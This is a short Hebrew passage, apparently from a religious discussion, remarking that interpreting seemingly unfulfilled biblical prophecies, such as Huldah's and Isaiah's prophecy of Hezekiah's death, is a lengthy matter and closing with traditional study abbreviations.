כמובן שהדברים ארוכים, כאשר אנו מנסים לפענח נבואות נוספות שלכאורה לא התקיימו כמו נבואות חולדה דלעיל, נבואת ישעיהו שחזקיה ימות מחוליו, ועוד ... וק"ק, ואכמ"ל, ודו"ק, והבן, והקשה, ותרץ, ותהנה...
 |
|
|
|
|
|